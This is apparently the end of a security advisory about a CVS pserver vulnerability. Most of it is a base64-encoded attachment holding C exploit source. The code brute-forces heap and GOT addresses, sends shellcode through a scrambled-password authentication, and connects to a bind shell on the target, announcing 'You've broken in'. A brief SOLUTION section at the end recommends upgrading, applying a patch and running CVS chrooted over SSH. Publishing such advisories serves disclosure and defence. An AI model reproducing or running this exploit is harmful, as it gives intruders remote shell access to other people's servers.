dCB3cml0ZWFibGUgbWVtb3J5LCByZWFkanVzdGluZ1xuIik7DQogICAgICAg
ICAgZm91bmQgPSAxOw0KICAgICAgICAgIGdvdF9sb3cgPSBnb3RfaSArIGp1
bXAgKiAxMDI0Ow0KICAgICAgICAgIGhlYXBfbG93ID0gZ290X2xvdyArIDEw
MjQ7DQogICAgICAgICAgZ290X2hpZ2ggPSBnb3RfbG93ICsgMTAyNDsNCiAg
ICAgICAgICBnb3Rfc3RlcCA9IHN0ZXA7DQogICAgICAgICAgaGVhcF9zdGVw
ID0gKE1BWF9BUkdfU0laRSAtIDB4ODAgLSBzaXplb2Yoc2hlbGxjb2RlKSkg
JiB+MTsNCiAgICAgICAgICBnb3RvIExPT1A7DQogICAgICAgIH0NCiAgICAg
ICAgZWxzZQ0KICAgICAgICAgIGJyZWFrOw0KICAgICAgfQ0KDQoNCiAgICB9
DQogICAgZG9uZShob3N0LCAzMDQ2NCk7DQogIH0NCiAgZnByaW50ZihzdGRl
cnIsICJUaGUgZXhwbG9pdCBkaWRuJ3Qgd29yayBvbiB0aGlzIGhvc3QsIHNv
cnJ5Li4uXG4iKTsNCiAgcmV0dXJuIDA7DQp9DQoNCmludA0KY29ubmVjdF90
b19ob3N0IChjaGFyICpob3N0LCBpbnQgcG9ydCwgaW50ICpmZF9pbiwgaW50
ICpmZF9vdXQpDQp7DQogIGlmKCFzdHJjbXAoaG9zdCwgImxvY2FsIikpDQog
IHsNCi8qIEkgdXNlZCB0aGlzIGZvciBkZWJ1Z2dpbmcsIG5vdCB0byB3b3Jy
eSAqLw0KICAgICpmZF9pbiAgPSAwOw0KICAgICpmZF9vdXQgPSAxOw0KICB9
DQogIGVsc2UNCiAgew0KICAgIGludCBzb2NrLCBvcHR2YWwgPSAxOw0KICAg
IHN0cnVjdCBzb2NrYWRkcl9pbiB0YXJnZXQgPSB7IDAgfTsNCiAgICBzdHJ1
Y3QgaG9zdGVudCAqaGU7DQogICAgdGFyZ2V0LnNpbl9mYW1pbHkgPSBQRl9J
TkVUOw0KICAgIGhlID0gZ2V0aG9zdGJ5bmFtZShob3N0KTsNCiAgICBpZihO
VUxMID09IGhlKQ0KICAgIHsNCiAgICAgIGNoYXIgKm1zZyA9IG1hbGxvYyhz
dHJsZW4oaG9zdCkgKyA1MCk7DQogICAgICBpZihOVUxMID09IG1zZykgZGll
KE5NKTsNCiAgICAgIHNwcmludGYobXNnLCAiQ291bGRuJ3QgcmVzb2x2ZSBo
b3N0ICVzIiwgaG9zdCk7DQogICAgICBkaWUobXNnKTsNCiAgICB9DQogICAg
dGFyZ2V0LnNpbl9hZGRyID0gKigoc3RydWN0IGluX2FkZHIgKiloZS0+aF9h
ZGRyKTsNCiAgICB0YXJnZXQuc2luX3BvcnQgPSBodG9ucyhwb3J0KTsNCg0K
ICAgIGlmKChzb2NrID0gc29ja2V0KFBGX0lORVQsIFNPQ0tfU1RSRUFNLCA2
KSkgPT0gLTEpDQogICAgew0KICAgICAgcGVycm9yKCJzb2NrZXQiKTsNCiAg
ICAgIGV4aXQoMSk7DQogICAgfQ0KICAgIGlmKHNldHNvY2tvcHQoc29jaywg
U09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAmb3B0dmFsLCBzaXplb2Ygb3B0
dmFsKSkNCiAgICAgIHBlcnJvcigic2V0c29ja29wdCIpOw0KICAgIA0KICAg
IGlmKGNvbm5lY3Qoc29jaywgKHN0cnVjdCBzb2NrYWRkciAqKSZ0YXJnZXQs
IHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSkNCiAgICB7DQogICAgICByZXR1
cm4gLTE7DQogICAgfQ0KICAgICpmZF9pbiA9ICpmZF9vdXQgPSBzb2NrOw0K
ICB9DQp1c2xlZXAoNTAwMDAwKTsgLyogbWFrZSBpbmV0ZCBoYXBweSAqLw0K
ICByZXR1cm4gMDsNCn0NCiAgICANCmludA0KYXV0aGVudGljYXRlIChjaGFy
ICpyZXBvcywgY2hhciAqdXNlciwgY2hhciAqcGFzc3dkLCBpbnQgZmRfaW4s
IGludCBmZF9vdXQpDQp7DQogIGNoYXIgYnVmWzE2XTsNCiAgY2hhciAqb3V0
ID0gbWFsbG9jKDUwICsgc3RybGVuKHJlcG9zKSArIHN0cmxlbih1c2VyKSAr
IHN0cmxlbihwYXNzd2QpKTsNCiAgaWYoTlVMTCA9PSBvdXQpIGRpZShOTSk7
DQoNCiAgc3ByaW50ZihvdXQsICJCRUdJTiBBVVRIIFJFUVVFU1RcbiINCiAg
ICAiJXNcbiINCiAgICAiJXNcbiINCiAgICAiJXNcbiINCiAgICAiRU5EIEFV
VEggUkVRVUVTVFxuIiwgcmVwb3MsIHVzZXIsIHNjcmFtYmxlKHBhc3N3ZCkp
Ow0KDQogIGlmKHRhbGsob3V0LCBmZF9vdXQpKSBkaWUoIlNvY2tldCB3cml0
ZSBlcnJvciIpOw0KICBmcmVlKG91dCk7DQogIGdldChidWYsIHNpemVvZiBi
dWYsIGZkX2luKTsNCiAgcmV0dXJuIHN0cmNtcChidWYsICJJIExPVkUgWU9V
XG4iKTsNCn0NCg0KDQoNCmludA0KdGFsayAoY2hhciAqYnVmLCBpbnQgZmQp
DQp7DQogIGludCB3cml0dGVuID0gMDsNCiAgaW50IHJldCA9IC0xOw0KICBm
ZF9zZXQgd3JpdGVmZDsNCiAgc3RydWN0IHRpbWV2YWwgdHYgPSB7IDAgfTsN
CiAgaW50IGxlbiA9IHN0cmxlbihidWYpOw0KDQogIEZEX1pFUk8oJndyaXRl
ZmQpOw0KICBGRF9TRVQoIGZkLCAmd3JpdGVmZCk7DQoNCiAgaWYoc2VsZWN0
KGZkKzEsIE5VTEwsICZ3cml0ZWZkLCBOVUxMLCAmdHYpKQ0KICB7DQojaWZk
ZWYgREVCVUcNCiAgICBmcHJpbnRmKHN0ZGVyciwgInRhbGs6ICVzIiwgYnVm
KTsNCiNlbmRpZg0KICAgIGlmKGxlbikNCiAgICAgIHdyaXR0ZW4gPSB3cml0
ZShmZCwgYnVmLCBsZW4pOw0KICAgIHJldCA9ICh3cml0dGVuICE9IGxlbik7
IC8qIDAgb24gc3VjY2VzcyAqLw0KICB9DQogIHJldHVybiByZXQ7DQp9DQoN
CmludA0KZ2V0IChjaGFyICpidWYsIGludCBsZW4sIGludCBmZCkNCnsNCiAg
ZmRfc2V0IHJlYWRmZDsNCg0KICBpbnQgcmV0ID0gLTI7DQogIHN0cnVjdCB0
aW1ldmFsIHR2Ow0KDQogIEZEX1pFUk8oJnJlYWRmZCk7DQogIEZEX1NFVCgg
ZmQsICZyZWFkZmQpOw0KDQogIHR2LnR2X3NlYyA9IHRpbWVvdXQ7DQogIHR2
LnR2X3VzZWMgPSAwOw0KDQogIGlmKHNlbGVjdChmZCsxLCAmcmVhZGZkLCBO
VUxMLCBOVUxMLCAmdHYpKQ0KICB7DQogICAgYnVmWzBdID0gMDsNCiAgICBy
ZXQgPSByZWFkKGZkLCBidWYsIGxlbiAtIDEpOw0KDQojaWZkZWYgREVCVUcN
CiAgZnByaW50ZihzdGRlcnIsICJnZXQ6ICVzIiwgYnVmKTsNCiNlbmRpZg0K
DQogICAgYnVmW3JldF0gPSAnXDAnOw0KICB9DQogIHJldHVybiByZXQ7DQp9
DQoNCnZvaWQNCnVzYWdlICh2b2lkKQ0Kew0KICBmcHJpbnRmKHN0ZGVyciwg
IlVzYWdlOiAlcyAtciByZXBvc2l0b3J5IC11IHVzZXJuYW1lIFsgLXAgcGFz
c3dvcmQgXSBbIC1hIHBvcnQgXSAiDQogICAgIlsgLXQgdGltZW91dCBdIFsg
LWogaW50ZWdlciBhcm91bmQgMCB0byAxMCwgZGVmYXVsdCA3LCBvYnNjdXJl
IGZlYXR1cmUgXSINCiAgICAiIFsgLXMgc3RlcCBpbnRlZ2VyIGJldHdlZW4g
NCBhbmQgMjQsIG11bHRpcGxlIG9mIDQsIHN0ZXAgZm9yIGJydXRlZm9yY2lu
ZyBdIGhvc3RcbiINCiAgICAiZS5nOiAlcyAtciAvdXNyL2xvY2FsL2N2cyAt
dSBhbm9ueW1vdXMgLXAgaGVsbG9cbiIsIHByb2duYW1lLCBwcm9nbmFtZSk7
DQogIGV4aXQoMSk7DQp9DQoNCnZvaWQNCmRpZSAoY29uc3QgY2hhciAqbXNn
KQ0Kew0KICBmcHJpbnRmKHN0ZGVyciwgIiVzOiAlc1xuIiwgcHJvZ25hbWUs
IG1zZyk7DQogIGV4aXQoMSk7DQp9DQoNCmNoYXIqDQp5c3RyZHVwIChjb25z
dCBjaGFyICpzKQ0Kew0KICBjaGFyICpmb28gPSBzdHJkdXAocyk7DQogIGlm
KE5VTEwgPT0gZm9vKSBkaWUoTk0pOw0KICByZXR1cm4gZm9vOw0KfQ0KDQpj
aGFyKg0Kc2NyYW1ibGUgKCBjaGFyICpzdHIpDQp7DQogICAgaW50IGk7DQog
ICAgY2hhciAqczsNCg0KICB1bnNpZ25lZCBjaGFyIHNoaWZ0c1tdID0gew0K
ICAgIDAsICAxLCAgMiwgIDMsICA0LCAgNSwgIDYsICA3LCAgOCwgIDksIDEw
LCAxMSwgMTIsIDEzLCAxNCwgMTUsDQogICAxNiwgMTcsIDE4LCAxOSwgMjAs
IDIxLCAyMiwgMjMsIDI0LCAyNSwgMjYsIDI3LCAyOCwgMjksIDMwLCAzMSwN
CiAgMTE0LDEyMCwgNTMsIDc5LCA5NiwxMDksIDcyLDEwOCwgNzAsIDY0LCA3
NiwgNjcsMTE2LCA3NCwgNjgsIDg3LA0KICAxMTEsIDUyLCA3NSwxMTksIDQ5
LCAzNCwgODIsIDgxLCA5NSwgNjUsMTEyLCA4NiwxMTgsMTEwLDEyMiwxMDUs
DQogICA0MSwgNTcsIDgzLCA0MywgNDYsMTAyLCA0MCwgODksIDM4LDEwMywg
NDUsIDUwLCA0MiwxMjMsIDkxLCAzNSwNCiAgMTI1LCA1NSwgNTQsIDY2LDEy
NCwxMjYsIDU5LCA0NywgOTIsIDcxLDExNSwgNzgsIDg4LDEwNywxMDYsIDU2
LA0KICAgMzYsMTIxLDExNywxMDQsMTAxLDEwMCwgNjksIDczLCA5OSwgNjMs
IDk0LCA5MywgMzksIDM3LCA2MSwgNDgsDQogICA1OCwxMTMsIDMyLCA5MCwg
NDQsIDk4LCA2MCwgNTEsIDMzLCA5NywgNjIsIDc3LCA4NCwgODAsIDg1LDIy
MywNCiAgMjI1LDIxNiwxODcsMTY2LDIyOSwxODksMjIyLDE4OCwxNDEsMjQ5
LDE0OCwyMDAsMTg0LDEzNiwyNDgsMTkwLA0KICAxOTksMTcwLDE4MSwyMDQs
MTM4LDIzMiwyMTgsMTgzLDI1NSwyMzQsMjIwLDI0NywyMTMsMjAzLDIyNiwx
OTMsDQogIDE3NCwxNzIsMjI4LDI1MiwyMTcsMjAxLDEzMSwyMzAsMTk3LDIx
MSwxNDUsMjM4LDE2MSwxNzksMTYwLDIxMiwNCiAgMjA3LDIyMSwyNTQsMTcz
LDIwMiwxNDYsMjI0LDE1MSwxNDAsMTk2LDIwNSwxMzAsMTM1LDEzMywxNDMs
MjQ2LA0KICAxOTIsMTU5LDI0NCwyMzksMTg1LDE2OCwyMTUsMTQ0LDEzOSwx
NjUsMTgwLDE1NywxNDcsMTg2LDIxNCwxNzYsDQogIDIyNywyMzEsMjE5LDE2
OSwxNzUsMTU2LDIwNiwxOTgsMTI5LDE2NCwxNTAsMjEwLDE1NCwxNzcsMTM0
LDEyNywNCiAgMTgyLDEyOCwxNTgsMjA4LDE2MiwxMzIsMTY3LDIwOSwxNDks
MjQxLDE1MywyNTEsMjM3LDIzNiwxNzEsMTk1LA0KICAyNDMsMjMzLDI1Mywy
NDAsMTk0LDI1MCwxOTEsMTU1LDE0MiwxMzcsMjQ1LDIzNSwxNjMsMjQyLDE3
OCwxNTIgfTsNCg0KICAgIHMgPSBtYWxsb2MgKHN0cmxlbiAoc3RyKSArIDIp
Ow0KICAgIGlmKE5VTEwgPT0gcykgZGllKE5NKTsNCg0KICAgIHNbMF0gPSAn
QSc7DQogICAgc3RyY3B5IChzICsgMSwgc3RyKTsNCg0KICAgIGZvciAoaSA9
IDE7IHNbaV07IGkrKykNCiAgICAgICAgc1tpXSA9IHNoaWZ0c1sodW5zaWdu
ZWQgY2hhcikoc1tpXSldOw0KDQogICAgcmV0dXJuIHM7DQp9DQoNCnZvaWQN
CmRvbmUgKGNoYXIqIGhvc3QsIGludCBwb3J0KQ0Kew0KICBpbnQgc29jazsN
CiAgaWYoY29ubmVjdF90b19ob3N0KGhvc3QsIHBvcnQsICZzb2NrLCAmc29j
aykpDQogICAgcmV0dXJuOw0KICBmcHJpbnRmKHN0ZGVyciwgIllvdSd2ZSBi
cm9rZW4gaW4sIGFuZCBoZXJlJ3MgeW91ciBwcml6ZVxuXG4iKTsNCiAgc2ln
bmFsKFNJR1BJUEUsIFNJR19ERkwpOw0KICBpZihmb3JrKCkpDQogIHsNCiAg
ICBjaGFyIGJ1ZlsxMDI0XTsNCiAgICBpbnQgbGVuOw0KICAgIHdyaXRlKHNv
Y2ssICJpZFxuIiwgMyk7DQogICAgd2hpbGUoKGxlbiA9IHJlYWQoMCwgYnVm
LCBzaXplb2YoYnVmKSkpICE9IEVPRikNCiAgICB7DQogICAgICB3cml0ZShz
b2NrLCBidWYsIGxlbik7DQogICAgfQ0KICB9DQogIGVsc2UNCiAgew0KICAg
IGNoYXIgYnVmWzEwMjRdOw0KICAgIGludCBsZW47DQogICAgd2hpbGUoKGxl
biA9IHJlYWQoc29jaywgYnVmLCBzaXplb2YoYnVmKSAtIDEpKSAhPSBFT0Yp
DQogICAgew0KICAgICAgYnVmW2xlbl0gPSAnXDAnOw0KICAgICAgZnByaW50
ZihzdGRlcnIsICIlcyIsIGJ1Zik7DQogICAgfQ0KICB9DQp9DQoNCi8qKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKi8NCg==
--8323328-300904865-1044185243=:1636--
SOLUTION
Immediatly update to the new version. You may also consider applying my
patch which adds the ability to turn off Update-prog and Checkin-prog
within your configuration files. You can download it from
http://security.e-matters.de/patches/cvs_disablexprog.diff
You should also consider running your CVS server chrooted over SSH
instead of using the :pserver: method. You can find a tutorial how to
setup such a server at
http://www.netsys.com/library/papers/chrooted-ssh-cvs-server.txt